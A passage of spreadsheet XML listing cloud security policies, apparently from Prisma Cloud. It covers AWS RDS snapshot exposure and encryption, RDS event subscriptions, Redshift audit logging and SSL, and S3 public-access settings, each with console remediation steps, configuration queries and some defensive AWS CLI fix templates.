          <t>PCI DSS v3.2,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T79" t="b">
        <v>1</v>
      </c>
      <c r="U79" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V79" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-snapshots</t>
        </is>
      </c>
      <c r="W79" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS snapshots which are accessible to public. Amazon Relational Database Service (Amazon RDS) is a web service that makes it easier to setup and manage databases. If RDS snapshots are inadvertently shared to public, any unauthorized user with AWS console access can gain access to the snapshots and gain access to sensitive data.</t>
        </is>
      </c>
      <c r="X79" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the 'RDS' service.
4. For the RDS instance reported in the alert, change 'Publicly Accessible' setting to 'No'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-302
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-302</t>
        </is>
      </c>
      <c r="Y79" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBSnapshotAttribute' permission. Successful execution will reset this RDS snapshot's ACL (Access Control List) to private. This will ensure that only Owner has full privileges.",
'impact': 'make this RDS snapshot private',
'cliScriptTemplate': 'aws rds --region $region modify-db-snapshot-attribute --db-snapshot-identifier $resourceId --attribute-name restore --values-to-remove "all"'</t>
        </is>
      </c>
      <c r="Z79" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-rds-describe-db-snapshots' AND json.rule="attributes[?(@.attributeName=='restore')]‌‌.attributeValues[*] contains all"
{"category":"General","resourceTypes":["aws_db_snapshot"]}</t>
        </is>
      </c>
      <c r="AA79" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB79" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC79" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-32-CKV_AWS_302</t>
        </is>
      </c>
      <c r="AD79" t="b">
        <v>1</v>
      </c>
      <c r="AE79" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF79" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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79" t="inlineStr">
        <is>
          <t>a707de6a-11b7-478a-b636-5e21ee1f6162</t>
        </is>
      </c>
      <c r="AI79" t="inlineStr">
        <is>
          <t>a707de6a-11b7-478a-b636-5e21ee1f6162</t>
        </is>
      </c>
      <c r="AJ79" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK79" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B80" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C80" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D80" t="inlineStr"/>
      <c r="E80" t="inlineStr"/>
      <c r="F80" t="inlineStr"/>
      <c r="G80" t="b">
        <v>1</v>
      </c>
      <c r="H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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J80" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K80" t="inlineStr">
        <is>
          <t>AWS RDS DB snapshot is not encrypted</t>
        </is>
      </c>
      <c r="L80" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M80" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N80" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O80" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P80" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q80" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R80" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S80" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T80" t="b">
        <v>0</v>
      </c>
      <c r="U80" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V80" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-snapshots</t>
        </is>
      </c>
      <c r="W80" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS DB (Relational Database Service Database) cluster snapshots which are not encrypted. It is highly recommended to implement encryption at rest when you are working with production data that have sensitive information, to protect from unauthorized access.</t>
        </is>
      </c>
      <c r="X80" t="inlineStr">
        <is>
          <t>You can encrypt a copy of an unencrypted snapshot. This way, you can quickly add encryption to a previously unencrypted DB instance.
Follow below steps to encrypt a copy of an unencrypted snapshot:
1. Log in to the AWS Console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to 'RDS' dashboard from 'Services' dropdown.
4. Click on 'Snapshot' from left menu.
5. Select the alerted snapshot
6. From 'Action' dropdown, select 'Copy Snapshot'
7. In 'Settings' section, from 'Destination Region' select a region,
8. Provide an identifier for the new snapshot in field 'New DB Snapshot Identifier'
9.In 'Encryption' section, select 'Enable Encryption'
10. Select a master key for encryption from the dropdown 'Master key'.
11. Click on 'Copy Snapshot'.
The source snapshot needs to be removed once the copy is available.
Note: If you delete a source snapshot before the target snapshot becomes available, the snapshot copy may fail. Verify that the target snapshot has a status of AVAILABLE before you delete a source snapshot. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-database-cluster-snapshot-is-encrypted-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-database-cluster-snapshot-is-encrypted-1</t>
        </is>
      </c>
      <c r="Y80" t="inlineStr"/>
      <c r="Z80" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-snapshots' AND json.rule = 'snapshot.status equals available and snapshot.encrypted is false'
{"category":"General","resourceTypes":["aws_db_cluster_snapshot"]}</t>
        </is>
      </c>
      <c r="AA80" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB80" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC80" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-498-CKV_AWS_146</t>
        </is>
      </c>
      <c r="AD80" t="b">
        <v>1</v>
      </c>
      <c r="AE80" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF80" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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0" t="inlineStr">
        <is>
          <t>74a52c45-75ae-404f-abf5-84b5cbd3d22f</t>
        </is>
      </c>
      <c r="AI80" t="inlineStr">
        <is>
          <t>c246e82d-85f0-4ead-b08b-4b7478ce6bcf</t>
        </is>
      </c>
      <c r="AJ80" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK80" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B81" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C81" s="2" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="D81" t="inlineStr"/>
      <c r="E81" t="inlineStr"/>
      <c r="F81" t="inlineStr"/>
      <c r="G81" t="b">
        <v>0</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J81" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K81" t="inlineStr">
        <is>
          <t>AWS RDS Event subscription All event categories and All instances disabled for DB instance</t>
        </is>
      </c>
      <c r="L81" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M81" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N81" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O81" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P81" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q81" t="inlineStr">
        <is>
          <t>Detect</t>
        </is>
      </c>
      <c r="R81" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="S81" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Detection services</t>
        </is>
      </c>
      <c r="T81" t="b">
        <v>1</v>
      </c>
      <c r="U81" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V81" t="inlineStr">
        <is>
          <t>aws-rds-describe-event-subscriptions</t>
        </is>
      </c>
      <c r="W81" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS event subscriptions for DB instance which has 'All event categories' and 'All instances' is disabled. As a best practice enabling 'All event categories' for 'All instances' helps to get notified when an event occurs for a DB instance.</t>
        </is>
      </c>
      <c r="X81" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Amazon RDS Dashboard
4. Click on 'Event subscriptions' (Left Panel)
5. Choose the reported Event subscription
6. Click on 'Edit'
7. On 'Edit event subscription' page, Under 'Details' section; Select 'Yes' for 'Enabled' and Make sure you have subscribed your DB to 'All instances' and 'All event categories'
8. Click on 'Edit'</t>
        </is>
      </c>
      <c r="Y81" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyEventSubscription' permission. Successful execution will enable event subscription for the respective RDS.",
'impact': 'Enable event subscription for the respective RDS',
'cliScriptTemplate': 'aws rds modify-event-subscription --subscription-name $resourceName --region $region --enabled'</t>
        </is>
      </c>
      <c r="Z81" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-event-subscriptions' AND json.rule = 'sourceType equals db-instance and ((status does not equal active or enabled is false) or (status equals active and enabled is true and (sourceIdsList is not empty or eventCategoriesList is not empty)))'</t>
        </is>
      </c>
      <c r="AA81" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB81" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC81" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-295</t>
        </is>
      </c>
      <c r="AD81" t="b">
        <v>1</v>
      </c>
      <c r="AE81" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF81" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>b858fad6-4f4a-49ec-b14e-b2c4639b3b1a</t>
        </is>
      </c>
      <c r="AI81" t="inlineStr">
        <is>
          <t>e122bb46-9075-4e3d-94a3-f428681e25c1</t>
        </is>
      </c>
      <c r="AJ81" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK81" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B82" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C82" s="2" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="D82" t="inlineStr"/>
      <c r="E82" t="inlineStr"/>
      <c r="F82" t="inlineStr"/>
      <c r="G82" t="b">
        <v>0</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J82" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K82" t="inlineStr">
        <is>
          <t>AWS RDS event subscription disabled for DB security groups</t>
        </is>
      </c>
      <c r="L82" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M82" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N82" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O82" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P82" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q82" t="inlineStr">
        <is>
          <t>Detect</t>
        </is>
      </c>
      <c r="R82" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="S82" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Detection services</t>
        </is>
      </c>
      <c r="T82" t="b">
        <v>0</v>
      </c>
      <c r="U82" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V82" t="inlineStr">
        <is>
          <t>aws-rds-describe-event-subscriptions</t>
        </is>
      </c>
      <c r="W82" t="inlineStr">
        <is>
          <t>This policy identifies RDS event subscriptions for which DB security groups event subscription is disabled. You can create an Amazon RDS event notification subscription so that you can be notified when an event occurs for given DB security groups.</t>
        </is>
      </c>
      <c r="X82" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Amazon RDS Dashboard
4. Click on 'Event subscriptions' (Left Panel)
5. Choose the reported Event subscription
6. Click on 'Edit'
7. On 'Edit event subscription' page, Under 'Details' section; Select 'Yes' for 'Enabled' and Make sure you have subscribed your DB to 'All instances' and 'All event categories'
8. Click on 'Edit'</t>
        </is>
      </c>
      <c r="Y82" t="inlineStr"/>
      <c r="Z82" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-event-subscriptions' AND json.rule = 'sourceType equals db-security-group and ((status does not equal active or enabled is false) or (status equals active and enabled is true and (sourceIdsList is not empty or eventCategoriesList is not empty)))'</t>
        </is>
      </c>
      <c r="AA82" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB82" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC82" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-292</t>
        </is>
      </c>
      <c r="AD82" t="b">
        <v>1</v>
      </c>
      <c r="AE82" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF82" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>2f33ac46-c909-4dca-8c0d-34fa2633865a</t>
        </is>
      </c>
      <c r="AI82" t="inlineStr">
        <is>
          <t>5b3c12cf-eef5-42de-afbe-4e80e1dfe600</t>
        </is>
      </c>
      <c r="AJ82" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK82" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B83" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C83" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D83" t="inlineStr"/>
      <c r="E83" t="inlineStr"/>
      <c r="F83" t="inlineStr"/>
      <c r="G83" t="b">
        <v>0</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J83" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K83" t="inlineStr">
        <is>
          <t>Copy of AWS Redshift database does not have audit logging enabled</t>
        </is>
      </c>
      <c r="L83" t="inlineStr"/>
      <c r="M83" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N83" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O83" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P83" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q83" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R83" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S83" t="inlineStr">
        <is>
          <t>Retain_Severity,Awesome_Standard,AW_AWS_Logging,Custom</t>
        </is>
      </c>
      <c r="T83" t="b">
        <v>0</v>
      </c>
      <c r="U83" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V83" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W83" t="inlineStr">
        <is>
          <t>Audit logging is not enabled by default in Amazon Redshift. When you enable logging on your cluster, Amazon Redshift creates and uploads logs to Amazon S3 that capture data from the creation of the cluster to the present time.</t>
        </is>
      </c>
      <c r="X83" t="inlineStr">
        <is>
          <t>1. Login to AWS Console.
2. Goto Amazon Redshift service
3. On left navigation panel, click on Clusters
4. Click on the reported cluster
5. Click on Database tab and choose 'Configure Audit Logging'
6. On Enable Audit Logging, choose 'Yes'
7. Create a new s3 bucket or use an existing bucket
8. click Save</t>
        </is>
      </c>
      <c r="Y83" t="inlineStr"/>
      <c r="Z83" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-redshift-describe-clusters' AND json.rule ='loggingStatus.loggingEnabled is false'</t>
        </is>
      </c>
      <c r="AA83" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB83" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC83" t="inlineStr"/>
      <c r="AD83" t="b">
        <v>0</v>
      </c>
      <c r="AE83" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF83" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>7c9a8327-5b71-4717-b6d0-7ff3a9ca2842</t>
        </is>
      </c>
      <c r="AI83" t="inlineStr">
        <is>
          <t>87ff879b-f48f-4857-a0b9-99a344f79ad1</t>
        </is>
      </c>
      <c r="AJ83" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK83" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B84" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C84" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D84" t="inlineStr"/>
      <c r="E84" t="inlineStr"/>
      <c r="F84" t="inlineStr"/>
      <c r="G84" t="b">
        <v>1</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J84" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K84" t="inlineStr">
        <is>
          <t>AWS Redshift database does not have audit logging enabled</t>
        </is>
      </c>
      <c r="L84" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M84" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N84" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O84" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P84" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q84" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R84" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S84" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T84" t="b">
        <v>0</v>
      </c>
      <c r="U84" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V84" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W84" t="inlineStr">
        <is>
          <t>Audit logging is not enabled by default in Amazon Redshift. When you enable logging on your cluster, Amazon Redshift creates and uploads logs to Amazon S3 that capture data from the creation of the cluster to the present time.</t>
        </is>
      </c>
      <c r="X84" t="inlineStr">
        <is>
          <t>1. Login to AWS Console.
2. Goto Amazon Redshift service
3. On left navigation panel, click on Clusters
4. Click on the reported cluster
5. Click on Database tab and choose 'Configure Audit Logging'
6. On Enable Audit Logging, choose 'Yes'
7. Create a new s3 bucket or use an existing bucket
8. click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12</t>
        </is>
      </c>
      <c r="Y84" t="inlineStr"/>
      <c r="Z84" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-redshift-describe-clusters' AND json.rule ='loggingStatus.loggingEnabled is false'
{"category":"Logging","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA84" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB84" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC84" t="inlineStr">
        <is>
          <t>PC-AWS-RED-45-CKV_AWS_71</t>
        </is>
      </c>
      <c r="AD84" t="b">
        <v>1</v>
      </c>
      <c r="AE84" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF84" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>91c941aa-d110-4b33-9934-aadd86b1a4d9</t>
        </is>
      </c>
      <c r="AI84" t="inlineStr">
        <is>
          <t>91c941aa-d110-4b33-9934-aadd86b1a4d9</t>
        </is>
      </c>
      <c r="AJ84" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK84" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B85" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C85" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D85" t="inlineStr"/>
      <c r="E85" t="inlineStr"/>
      <c r="F85" t="inlineStr"/>
      <c r="G85" t="b">
        <v>1</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J85" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K85" t="inlineStr">
        <is>
          <t>AWS Redshift does not have require_ssl configured</t>
        </is>
      </c>
      <c r="L85" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M85" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N85" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O85" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P85" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q85" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R85" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S85" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T85" t="b">
        <v>0</v>
      </c>
      <c r="U85" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V85" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W85" t="inlineStr">
        <is>
          <t>This policy identifies Redshift databases in which data connection to and from is occurring on an insecure channel. SSL connections ensures the security of the data in transit.</t>
        </is>
      </c>
      <c r="X85" t="inlineStr">
        <is>
          <t>1. Login to the AWS and navigate to the 'Amazon Redshift' service.
2. Expand the identified 'Redshift' cluster and make a note of the 'Cluster Parameter Group'
3. In the navigation panel, click on the 'Parameter group'.
4. Select the identified 'Parameter Group' and click on 'Edit Parameters'.
5. Review the require_ssl flag. Update the parameter 'require_ssl' to true and save it.
Note: If the current parameter group is a Default parameter group, it cannot be edited. You will need to create a new parameter group and point it to an affected cluster. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl</t>
        </is>
      </c>
      <c r="Y85" t="inlineStr"/>
      <c r="Z85" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-redshift-describe-clusters' AND json.rule = "clusterGroupsDetails[*].parameters[?(@.parameterName=='require_ssl')].parameterValue is false"
{"category":"General","resourceTypes":["aws_redshift_parameter_group"]}</t>
        </is>
      </c>
      <c r="AA85" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB85" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC85" t="inlineStr">
        <is>
          <t>PC-AWS-RED-44-CKV_AWS_105</t>
        </is>
      </c>
      <c r="AD85" t="b">
        <v>1</v>
      </c>
      <c r="AE85" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF85" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>7446ad28-8502-4d71-b334-18cef8d85a2b</t>
        </is>
      </c>
      <c r="AI85" t="inlineStr">
        <is>
          <t>7446ad28-8502-4d71-b334-18cef8d85a2b</t>
        </is>
      </c>
      <c r="AJ85" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK85" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B86" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C86" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D86" t="inlineStr"/>
      <c r="E86" t="inlineStr"/>
      <c r="F86" t="inlineStr"/>
      <c r="G86" t="b">
        <v>0</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J86" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K86" t="inlineStr">
        <is>
          <t>Customized AWS S3 Buckets Block public access setting disabled</t>
        </is>
      </c>
      <c r="L86" t="inlineStr"/>
      <c r="M86" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N86" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O86" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P86" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q86" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R86" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S86" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure network configuration,Custom</t>
        </is>
      </c>
      <c r="T86" t="b">
        <v>0</v>
      </c>
      <c r="U86" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V86" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W86" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 buckets which have 'Block public access' setting disabled. Amazon S3 provides 'Block public access' setting to manage public access of AWS S3 buckets. Enabling 'Block public access' setting prevents S3 resource data being accidentally or maliciously becoming publicly accessible. It is highly recommended to enable 'Block public access' setting for all AWS s3 buckets appropriately.</t>
        </is>
      </c>
      <c r="X86" t="inlineStr"/>
      <c r="Y86" t="inlineStr"/>
      <c r="Z86" t="inlineStr">
        <is>
